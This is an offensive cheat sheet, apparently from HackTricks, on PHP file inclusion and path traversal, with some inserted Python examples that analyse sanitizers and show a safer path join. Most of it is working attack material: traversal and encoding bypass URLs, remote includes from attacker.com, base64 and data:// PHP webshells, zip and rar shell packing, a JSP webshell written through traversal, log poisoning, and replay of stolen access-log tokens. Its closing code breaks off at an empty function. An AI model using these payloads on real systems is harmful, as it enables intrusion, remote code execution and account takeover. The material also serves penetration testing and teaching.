File Inclusion/Path traversal
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
File Inclusion
Remote File Inclusion (RFI): the file is loaded from a remote server (best case: you write the code and the server executes it). In PHP this is disabled by default (allow_url_include).
Local File Inclusion (LFI): the server loads a local file.
The vulnerability occurs when the user can control, in some way, the file that is going to be loaded by the server.
Vulnerable PHP functions: require, require_once, include, include_once
A useful tool to exploit this vulnerability: https://github.com/kurobeats/fimap
Blind - Interesting - LFI2RCE files
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
Linux
Mixing several *nix LFI lists and adding more paths, I created this one:
Try also to change / for \
Try also to add ../../../../../
A list that uses several techniques to find the file /etc/passwd (to check whether the vulnerability exists) can be found here
Windows
Merge of different wordlists:
Try also to change / for \
Try also to remove C:/ and add ../../../../../
A list that uses several techniques to find the file /boot.ini (to check whether the vulnerability exists) can be found here
OS X
Check the LFI list for Linux.
Basic LFI and bypasses
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion too (page=http://myserver.com/phpshellcode.txt).
http://example.com/index.php?page=../../../etc/passwd
Traversal sequences stripped non-recursively
If the filter removes "../" in a single pass, "....//" collapses to "../" after the removal:
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
Null byte (%00)
Bypasses the appending of extra characters to the end of the provided string (bypass of: $_GET['param']."php")
http://example.com/index.php?page=../../../etc/passwd%00
This was fixed in PHP 5.3.4 (paths containing a null byte are rejected), so it does not work on PHP 5.4 and later.
Encoding
You can use non-standard encodings such as double URL encoding (and others):
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
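To see why each bypass above works (and against which kind of filter), here is an added example that is not part of the original page: it emulates the naive sanitizers the bypasses defeat and reports which of the page's payloads still reach the filesystem with a ".." segment. The sanitizer functions and the pipeline order are hypothetical stand-ins for the filters the page describes, not code from any real application.

```python
"""Added example, not part of the original page: emulate the naive path
sanitizers that the bypasses in this section defeat and report which payloads
still reach the filesystem with a '..' segment.

Every sanitizer and the pipeline order below are hypothetical stand-ins for the
kind of filter the page describes; the payloads are the page's own.
"""
from urllib.parse import unquote


def strip_traversal_once(path):
    """Single-pass removal of '../': the bug behind the '....//' bypass."""
    return path.replace("../", "")


def strip_traversal_recursive(path):
    """Loops until no '../' is left; beats '....//' but not encoded slashes."""
    while "../" in path:
        path = path.replace("../", "")
    return path


def reject_dotdot(path):
    """Refuses any value containing '..' as seen after a single URL decode."""
    if ".." in path:
        raise ValueError("traversal rejected")
    return path


def has_traversal(path):
    """True if the path, as the OS would see it, contains a '..' segment."""
    return ".." in path.replace("\\", "/").split("/")


def effective_path(raw, sanitizer, app_decodes_again=False, appends_php=False,
                   null_byte_truncation=False):
    """Run one raw query value through a hypothetical server pipeline:

    1. the web framework URL-decodes the parameter once;
    2. the application sanitizer runs (raises to reject the request);
    3. optionally the application URL-decodes a second time (the double
       encoding scenario) and/or appends '.php';
    4. optionally the C-string cut at NUL that PHP before 5.3.4 exhibited.
    Returns the path the filesystem would be asked for, or None if rejected.
    """
    param = unquote(raw)
    try:
        path = sanitizer(param)
    except ValueError:
        return None
    if app_decodes_again:
        path = unquote(path)
    if appends_php:
        path += ".php"
    if null_byte_truncation:
        path = path.split("\x00", 1)[0]
    return path


def surviving_payloads(sanitizer, payloads, **pipeline):
    """Payloads that leave the pipeline still containing a '..' segment."""
    survivors = []
    for p in payloads:
        final = effective_path(p, sanitizer, **pipeline)
        if final is not None and has_traversal(final):
            survivors.append(p)
    return survivors


PAGE_PAYLOADS = [
    "../../../etc/passwd",
    "....//....//....//etc/passwd",
    "..%252f..%252f..%252fetc%252fpasswd",
    "%252e%252e%252fetc%252fpasswd",
]

if __name__ == "__main__":
    for name, san in [("strip once", strip_traversal_once),
                      ("strip recursive", strip_traversal_recursive),
                      ("reject '..'", reject_dotdot)]:
        for again in (False, True):
            print(f"{name:16} second decode={again!s:5}",
                  surviving_payloads(san, PAGE_PAYLOADS, app_decodes_again=again))
    # The null byte cuts off the appended '.php' on PHP < 5.3.4 only.
    print(effective_path("../../../etc/passwd%00", lambda p: p,
                         appends_php=True, null_byte_truncation=True))
```

Run it and the table shows the pattern behind the section: the single-pass strip lets "....//" through, the recursive strip only falls to the double-encoded payloads when the application decodes a second time, and the plain ".." check is beaten by the "%252e%252e%252f" form because the dots only appear after the check has run.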
HTML-to-PDF SVG/IMG path traversal
Modern HTML-to-PDF engines (e.g. TCPDF or wrappers such as html2pdf) happily parse attacker-supplied HTML, SVG, CSS and font URLs, yet they run inside trusted backend networks with filesystem access. Once you can inject HTML into $pdf->writeHTML()/Html2Pdf::writeHTML(), you can often exfiltrate local files that the web server account can read.
- Fingerprint the renderer: every generated PDF carries a Producer field (e.g. TCPDF 6.8.2). Knowing the exact build tells you which path filters exist and whether URL decoding happens before validation.
- Inline SVG payloads: TCPDF::startSVGElementHandler() reads the xlink:href attribute of <image> elements before running urldecode(). Embedding the malicious SVG inside a data URI makes most HTML sanitizers ignore the payload while TCPDF still parses it:
<img src="" />
TCPDF prepends $_SERVER['DOCUMENT_ROOT'] to paths starting with / and only resolves .. afterwards; therefore use leading ../../.. or /../../.. segments to step out of the document root after it has been prepended.
- Encoding to bypass naive filters: versions ≤6.8.2 only check for the literal substring ../ before URL decoding. Sending ..%2f (or ..%2F) inside the SVG or in a raw <img src> attribute passes the check, because the dot-dot-slash sequence is only reconstructed after TCPDF calls urldecode().
- Double encoding for multi-stage decoding: if the user input is decoded both by the web framework and by TCPDF, double-encode the slash (%252f). The first decode turns it into %2f, the second one inside TCPDF turns it into /, so /..%252f.. becomes /../../../… without ever showing ../ to the earlier filters.
- HTML <img> handler: TCPDF::openHTMLTagHandler() has the same order-of-operations bug, allowing direct HTML payloads such as src="%2f..%252f..%252ftmp%252fsecret.png" to read any locally reachable bitmap.
This technique leaks whatever the PDF worker can read (passport scans, API keys rendered as images, etc.). The maintainers fixed it in 6.9.1 by enforcing path canonicalisation (isRelativePath()), so during testing prioritise targets whose Producer field reports an older version.
From an existing folder
Maybe the back-end is checking the folder path:
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
Exploring File System Directories on a Server
The file system of a server can be explored recursively to identify directories, not just files, by employing certain techniques. This process involves determining the directory depth and probing for the existence of specific folders. The oracle works because the operating system resolves a path component by component: a non-existent folder makes the lookup fail even though the following .. would cancel it out. Below is a detailed method to achieve this:
- Identify Directory Depth: determine the depth of your current directory by successfully fetching the /etc/passwd file (applicable if the server is Linux-based). An example URL might be structured as follows, indicating a depth of three:
http://example.com/index.php?page=../../../etc/passwd # depth of 3
- Probe for Folders: append the name of the suspected folder (e.g., private) to the URL, then navigate back to /etc/passwd. The additional directory level requires incrementing the depth by one:
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
- Interpret the Outcomes: the server's response indicates whether the folder exists:
  - Error / No Output: the folder private likely does not exist at the specified location.
  - Contents of /etc/passwd: the presence of the private folder is confirmed.
- Recursive Exploration: discovered folders can be further probed for subdirectories or files using the same technique or traditional Local File Inclusion (LFI) methods.
To explore directories at different locations in the file system, adjust the payload accordingly. For instance, to check whether /var/www/ contains a private directory (assuming the current directory is at a depth of 3), use:
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
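The probing technique above can be reproduced locally. The following is an added example, not part of the original page: it builds a constructed temporary tree (a fake root containing etc/passwd and var/www/html/private), issues the same "folder/../../../../etc/passwd" probes a vulnerable include would, and shows that the OS answers differently for an existing and a missing folder while a purely lexical normaliser cannot tell the two apart. Paths and folder names are this example's own.

```python
"""Added example, not part of the original page: the folder-probing oracle
from this section reproduced against a real (temporary, constructed) tree.

The oracle works because POSIX path resolution walks the components left to
right: 'private/../../../../etc/passwd' only opens if 'private' exists, while
a purely lexical normaliser (posixpath.normpath) collapses it either way and
so cannot distinguish the two cases.
"""
import os
import posixpath
import shutil
import tempfile


def build_probe(depth, folder, target="etc/passwd"):
    """The page's payload shape: folder, then (depth + 1) traversals."""
    return f"{folder}/" + "../" * (depth + 1) + target


def folder_exists_via_traversal(cwd, folder, depth, target="etc/passwd"):
    """Emulates the vulnerable include: open(cwd + '/' + probe) and check that
    the known-good target came back. True means `folder` exists under cwd."""
    probe = build_probe(depth, folder, target)
    try:
        with open(os.path.join(cwd, probe), "rb") as fh:
            return fh.read() != b""
    except OSError:  # ENOENT or ENOTDIR: some component is missing
        return False


def lexical_resolution(cwd, probe):
    """What a string-only normaliser believes the probe points at."""
    return posixpath.normpath(posixpath.join(cwd, probe))


def demo():
    """Build <root>/etc/passwd and <root>/var/www/html/private, then probe for
    'private' (exists) and 'backup' (does not) from the web root at depth 3."""
    root = tempfile.mkdtemp()
    try:
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(root, "etc", "passwd"), "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample
        webroot = os.path.join(root, "var", "www", "html")  # depth 3 below root
        os.makedirs(os.path.join(webroot, "private"))
        results = {
            "private": folder_exists_via_traversal(webroot, "private", 3),
            "backup": folder_exists_via_traversal(webroot, "backup", 3),
        }
        # Both probes normalise to the same string, so a lexical check is
        # blind to the difference the filesystem just revealed.
        lexically_identical = (
            lexical_resolution(webroot, build_probe(3, "private"))
            == lexical_resolution(webroot, build_probe(3, "backup"))
        )
    finally:
        shutil.rmtree(root)
    return results, lexically_identical


if __name__ == "__main__":
    print(demo())
```

The second value returned by demo() is the defender's lesson: any server-side check that normalises the string instead of resolving it against the real filesystem will treat both probes as identical, which is exactly why the oracle leaks directory names.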
Path Truncation Technique
Path truncation is a method employed to manipulate file paths in web applications. It is often used to access restricted files by bypassing security measures that append additional characters to the end of file paths. The goal is to craft a file path that, once altered by the security measure, still points to the desired file.
In PHP, various representations of a file path can be considered equivalent due to the nature of the file system. For instance:
- /etc/passwd, /etc//passwd, /etc/./passwd and /etc/passwd/ are all treated as the same path.
- When the last 6 characters are passwd, appending a / (making it passwd/) doesn't change the targeted file.
- Similarly, if .php is appended to a file path (like shellcode.php), adding a /. at the end will not alter the file being accessed.
The provided examples demonstrate how to utilize path truncation to access /etc/passwd, a common target due to its sensitive content (user account information):
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
In these scenarios, the number of traversals needed might be around 2027, but this number can vary based on the server's configuration.
- Using Dot Segments and Additional Characters: traversal sequences (../) combined with extra dot segments and characters can be used to navigate the file system, effectively ignoring strings appended by the server.
- Determining the Required Number of Traversals: through trial and error, one can find the precise number of ../ sequences needed to navigate to the root directory and then to /etc/passwd, ensuring that any appended strings (like .php) are neutralized while the desired path (/etc/passwd) remains intact.
- Starting with a Fake Directory: it is common practice to begin the path with a non-existent directory (like a/). This is used as a precautionary measure or to satisfy the requirements of the server's path parsing logic.
When employing path truncation techniques, it is crucial to understand the server's path parsing behaviour and file system structure. Each scenario might require a different approach, and testing is often necessary to find the most effective method.
This vulnerability was corrected in PHP 5.3.
Filter bypass tricks
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter
Remote File Inclusion
In PHP this is disabled by default because allow_url_include is Off. It must be On for it to work, and in that case you could include a PHP file from your server and get RCE:
http://example.com/index.php?page=http://attacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
If for some reason allow_url_include is On but PHP is filtering access to external web pages, according to this post you could use, for example, the data protocol with base64 to decode b64 PHP code and get RCE:
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
Tip
In the previous code, the final +.txt was added because the attacker needed a string that ended in .txt, so the string ends with it; after the b64 decode that part returns just junk and the real PHP code is included (and therefore executed).
Another example not using the php:// protocol would be:
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
Python Root element
In Python, in code like this one:
# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
If the user passes an absolute path for file_name, the previous path is simply discarded:
os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
This is the intended behaviour according to the docs:
If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
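The following is an added example, not part of the original page: it puts the vulnerable os.path.join pattern next to a resolver that refuses to leave the base directory. safe_join is a hypothetical helper written for this example (it is not a standard-library function); the same check, canonicalise and then require the result to sit under an allow-listed base, is what the hardening advice for the file-write primitive later on this page asks for.

```python
"""Added example, not part of the original page: the os.path.join pitfall from
this section next to a resolver that refuses to leave the base directory.

`safe_join` is a hypothetical helper written for this example (not a standard
library function). The same check, canonicalise and then require the result
to sit under an allow-listed base, is what the hardening advice for the file
write primitive later on this page asks for.
"""
import os


def naive_join(user_path, base=None):
    """The vulnerable pattern from the page: an absolute component discards
    everything before it, and '..' components are joined verbatim."""
    base = base or os.getcwd()
    return os.path.join(base, "public", user_path)


def safe_join(user_path, base=None):
    """Resolve user_path under <base>/public and fail closed if the canonical
    result is outside that directory.

    Rejects absolute paths and drive letters up front, then compares the
    realpath (symlinks resolved) against the realpath of the public root so
    that neither '..' segments nor a planted symlink can escape it.
    """
    base = base or os.getcwd()
    root = os.path.realpath(os.path.join(base, "public"))
    if os.path.isabs(user_path) or os.path.splitdrive(user_path)[0]:
        raise ValueError("absolute paths are not allowed")
    candidate = os.path.realpath(os.path.join(root, user_path))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes the public directory")
    return candidate


def classify(user_path, base=None):
    """('ok', resolved_path) or ('rejected', reason) for one user value."""
    try:
        return "ok", safe_join(user_path, base)
    except ValueError as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    for p in ["/etc/passwd", "../../../../etc/passwd", "css/site.css"]:
        print(f"{p!r:30} naive -> {naive_join(p)!r}")
        print(f"{'':30} safe  -> {classify(p)}")
```

Note that the check is done on the realpath of both sides: comparing the user string against the base before symlinks are resolved would let a symlink inside public point at /etc, and a plain string-prefix comparison (startswith) would accept a sibling directory such as public2.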
Java List Directories
It looks like if you have a Path Traversal in Java and you ask for a directory instead of a file, a listing of the directory is returned. This won't happen in other languages (afaik).
Top 25 parameters
Here is a list of the top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from link):
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
LFI / RFI using PHP wrappers & protocols
php://filter
PHP filters allow basic modification operations on the data before it is read or written. There are 5 categories of filters:
- String Filters:
  - string.rot13
  - string.toupper
  - string.tolower
  - string.strip_tags: removes tags from the data (everything between "<" and ">" characters). Note that this filter is no longer available in modern PHP versions.
- Conversion Filters:
  - convert.base64-encode
  - convert.base64-decode
  - convert.quoted-printable-encode
  - convert.quoted-printable-decode
  - convert.iconv.*: transforms to a different encoding (convert.iconv.<input_enc>.<output_enc>). To get the list of all supported encodings run in the console: iconv -l
Warning
Abusing the convert.iconv.* conversion filter you can generate arbitrary text, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check LFI2RCE via php filters.
- Compression Filters:
  - zlib.deflate: compresses the content (useful if exfiltrating a lot of info)
  - zlib.inflate: decompresses the data
- Encryption Filters:
  - mcrypt.*: deprecated
  - mdecrypt.*: deprecated
- Other Filters:
  - Running var_dump(stream_get_filters()); inside PHP you can find a couple of unexpected filters: consumed, dechunk (decodes HTTP chunked transfer encoding) and convert.*
# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.strip_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");
# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");
# Compression Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that the PHP protocol is case-insensitive (that means you can use "PhP://" and any other variant)
Warning
The "php://filter" part is case insensitive
Using php filters as an oracle to read arbitrary files
In this post a technique is proposed to read a local file without having the output returned by the server. It relies on a boolean exfiltration of the file (char by char) using php filters as an oracle. This is possible because php filters can be used to make a text big enough to make php throw an exception.
The original post contains a detailed explanation of the technique, but here is a quick summary:
- Use the codec UCS-4LE to leave the leading character of the text at the beginning and make the size of the string grow exponentially.
- This is used to generate a text so big that, when the initial letter is guessed correctly, php triggers an error.
- The dechunk filter removes everything if the first char is not hexadecimal, so we can know whether the first char is hex.
- This, combined with the previous one (and other filters depending on the guessed letter), allows us to guess a letter at the beginning of the text by seeing when we have applied enough transformations to make it no longer a hexadecimal character. Because if it is hex, dechunk won't delete it and the initial bomb will make php error.
- The codec convert.iconv.UNICODE.CP930 transforms every letter into the following one (so after this codec: a -> b). This lets us discover whether the first letter is an a, for example, because if we apply this codec 6 times, a->b->c->d->e->f->g, the letter is no longer a hexadecimal character, therefore dechunk doesn't delete it and the php error is triggered because it multiplies with the initial bomb.
- Using other transformations like rot13 at the beginning it is possible to leak other chars like n, o, p, q, r (and other codecs can be used to move other letters into the hex range).
- When the initial char is a number it is necessary to base64 encode it and leak the first 2 letters to leak the number.
- The final problem is how to leak more than the initial letter. By using order memory filters like convert.iconv.UTF16.UTF-16BE and convert.iconv.UCS-4.UCS-4LE it is possible to change the order of the chars and get other letters of the text into the first position.
- To be able to get further data, the idea is to generate 2 bytes of junk data at the beginning with convert.iconv.UTF16.UTF16, apply UCS-4LE to make it pivot with the next 2 bytes, and delete the data up to the junk data (this will remove the first 2 bytes of the initial text). Continue doing this until you reach the bit you want to leak.
In the post a tool to perform this automatically was also released: php_filters_chain_oracle_exploit.
php://fd
This wrapper allows access to file descriptors that the process has open. Potentially useful to exfiltrate the content of opened files:
echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");
You can also use php://stdin, php://stdout and php://stderr to access file descriptors 0, 1 and 2 respectively (not sure how this could be useful in an attack)
zip:// and rar://
Upload a Zip or Rar file with a PHPShell inside and access it.
To be able to abuse the rar protocol it needs to be specifically activated.
# single quotes keep the shell from expanding $_GET before it reaches the file
echo '<pre><?php system($_GET["cmd"]); ?></pre>' > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php
data://
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
Note that this protocol is restricted by the php settings allow_url_fopen and allow_url_include
expect://
Expect has to be activated. You can execute code using this:
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
php://input
Specify your payload in the POST body:
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
phar://
A .phar file can be used to execute PHP code when a web application leverages functions such as include for file loading. The PHP snippet below demonstrates the creation of a .phar file (the code must be placed before __HALT_COMPILER(), since anything after that call is treated as data and never compiled):
<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php system("ls"); __HALT_COMPILER(); ?>');
$phar->stopBuffering();
To compile the .phar file, the following command should be executed:
php --define phar.readonly=0 create_path.php
Upon execution, a file named test.phar will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.
In cases where the LFI only reads the file without executing the PHP code within, through functions such as file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), or filesize(), exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the phar protocol.
For a detailed understanding of exploiting deserialization vulnerabilities in the context of .phar files, refer to the document linked below:
Phar Deserialization Exploitation Guide
CVE-2024-2961
It was possible to abuse any arbitrary file read in PHP that supports php filters to get RCE. The detailed description can be found in this post.
Very quick summary: a 3 byte overflow in glibc's iconv (reached through the convert.iconv.* filters) was abused to corrupt the PHP heap, altering the chain of free chunks of a specific size so that anything could be written at any address; a hook was then added to call system.
It was possible to allocate chunks of specific sizes by abusing more php filters.
More protocols
Check more protocols to include here:
- php://memory and php://temp: write in memory or in a temp file (not sure how this can be useful in a file inclusion attack)
- file://: accessing the local filesystem
- http://: accessing HTTP(s) URLs
- ftp://: accessing FTP(s) URLs
- zlib://: compression streams
- glob://: find pathnames matching a pattern (it doesn't return anything printable, so not really useful here)
- ssh2://: Secure Shell 2
- ogg://: audio streams (not useful to read arbitrary files)
LFI via PHP's 'assert'
Local File Inclusion (LFI) risks in PHP are notably high when dealing with the 'assert' function, which can execute code contained in strings. This is particularly problematic if input containing directory traversal characters like ".." is being checked but not properly sanitized.
For example, PHP code might be designed to prevent directory traversal like so:
assert("strpos('$file', '..') === false") or die("");
While this aims to stop traversal, it inadvertently creates a vector for code injection. To exploit this for reading file contents, an attacker could use:
' and die(highlight_file('/etc/passwd')) or '
Similarly, for executing arbitrary system commands, one might use:
' and die(system("id")) or '
It is important to URL-encode these payloads. Note that assert() with a string argument was deprecated in PHP 7.2 and string arguments are no longer evaluated as code from PHP 8.0, so this vector only applies to older PHP versions.
PHP Blind Path Traversal
Warning
This technique is relevant in cases where you control the file path of a PHP function that will access a file but you won't see the content of the file (like a simple call to file()) as the content isn't displayed.
In this incredible post it is explained how a blind path traversal can be abused via PHP filters to exfiltrate the content of a file via an error oracle.
In summary, the technique uses the "UCS-4LE" encoding to make the content of the file so big that the PHP function opening the file triggers an error.
Then, in order to leak the first char, the filter dechunk is used along with others such as base64 or rot13, and finally the filters convert.iconv.UCS-4.UCS-4LE and convert.iconv.UTF16.UTF-16BE are used to place other chars at the beginning and leak them.
Functions that might be vulnerable: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (only target read only with this), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs
For the technical details check the mentioned post!
LFI2RCE
Arbitrary File Write via Path Traversal (Webshell RCE)
When server-side code that ingests/uploads files builds the destination path from user-controlled data (e.g., filename or URL) without canonicalising and validating it, .. segments and absolute paths can escape the intended directory and cause an arbitrary file write. If you can place the payload under a web-exposed directory, you usually get unauthenticated RCE by dropping a webshell.
Typical exploitation workflow:
- Identify a write primitive in an endpoint or background worker that accepts a path/filename and writes content to disk (e.g., message-driven ingestion, XML/JSON command handlers, ZIP extractors, etc.).
- Determine web-exposed directories. Common examples:
  - Apache/PHP: /var/www/html/
  - Tomcat/Jetty: <tomcat>/webapps/ROOT/ → drop shell.jsp
  - IIS: C:\inetpub\wwwroot\ → drop shell.aspx
- Craft a traversal path that escapes the intended storage directory into the webroot, and include your webshell content.
- Browse to the dropped payload and execute commands.
Notes:
- The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
- On Java stacks, these file writes are typically implemented with simple File/Paths concatenation. The lack of canonicalisation/allow-listing is the core flaw.
Generic XML/JMF-style example (product schemas vary; the DOCTYPE/body wrapper is irrelevant for the traversal):
<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
<Command Type="SubmitQueueEntry">
<!-- Write outside the intake folder into the webroot via traversal -->
<Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
<Data>
<![CDATA[
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
Process p = Runtime.getRuntime().exec(c);
try (var in = p.getInputStream(); var out = response.getOutputStream()) {
in.transferTo(out);
}
}
%>
]]>
</Data>
</Command>
</JMF>
Hardening that defeats this class of bug:
- Resolve to a canonical path and enforce that it is a descendant of an allow-listed base directory.
- Reject any path containing .., absolute roots, or drive letters; prefer generated filenames.
- Run the writer as a low-privilege account and segregate write directories from served roots.
Remote File Inclusion
Explained previously, follow this link.
Via Apache/Nginx log file
If the Apache or Nginx server is vulnerable to LFI inside the include function you can try to access /var/log/apache2/access.log or /var/log/nginx/access.log, set inside the User-Agent or inside a GET parameter a php shell like <?php system($_GET['c']); ?> and include that file
Warning
Note that if you use double quotes for the shell instead of single quotes, the double quotes will be modified into the string "quote;", PHP will throw an error there and nothing else will be executed.
Also, make sure you write the payload correctly or PHP will error every time it tries to load the log file and you won't have a second opportunity.
This could also be done in other logs but be careful, the code inside the logs could be URL encoded and this could destroy the shell. The "Basic" Authorization header contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.
Other possible log paths:
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
Read access logs to harvest GET-based auth tokens (token replay)
Many applications mistakenly accept session/auth tokens via GET (e.g. AuthenticationToken, token, sid). If you have a path traversal/LFI primitive on the web server logs, you can steal those tokens from the access logs and replay them to bypass authentication entirely.
How-to:
- Use the traversal/LFI to read the web server access log. Common locations:
  - /var/log/apache2/access.log, /var/log/httpd/access_log
  - /var/log/nginx/access.log
- Some endpoints return file reads Base64-encoded. If so, decode locally and inspect the log lines.
- Grep for GET requests that include a token parameter and capture its value, then replay it against the application entry point.
Example flow (generic):
GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1
Host: target
Decode the body if it is Base64, then replay the captured token:
GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1
Host: target
Notes:
- Tokens in URLs are logged by default; never accept bearer tokens via GET in production systems.
- If the app supports multiple token names, look for common keys such as AuthenticationToken, token, sid, access_token.
- Rotate any tokens that may have leaked into logs.
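The two uses of access logs on this page, poisoning them (previous section) and mining them for tokens (this section), share one parsing step. The following is an added example, not part of the original page: a small combined-log parser that harvests token parameters from GET request lines and, from the defender's side, flags lines that plant a PHP tag in a logged field or traverse towards a log file. The log lines are constructed for the demo, the token names are the ones the page lists, and the detection rules are this example's own heuristics.

```python
"""Added example, not part of the original page: one combined-log parser used
for both things this page does with access logs. From the attacker's side it
harvests session tokens that were (wrongly) sent in GET query strings; from
the defender's side it flags log-poisoning attempts (a PHP tag planted in a
logged field) and traversal requests that pull the log back in.

The log lines are constructed for the demo; the token parameter names are the
ones the page lists. The detection rules are this example's own heuristics.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TOKEN_KEYS = {"authenticationtoken", "token", "sid", "access_token"}
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"(?:\.\.|%2e%2e)(?:/|\\|%2f|%5c)", re.IGNORECASE)


def parse_line(line):
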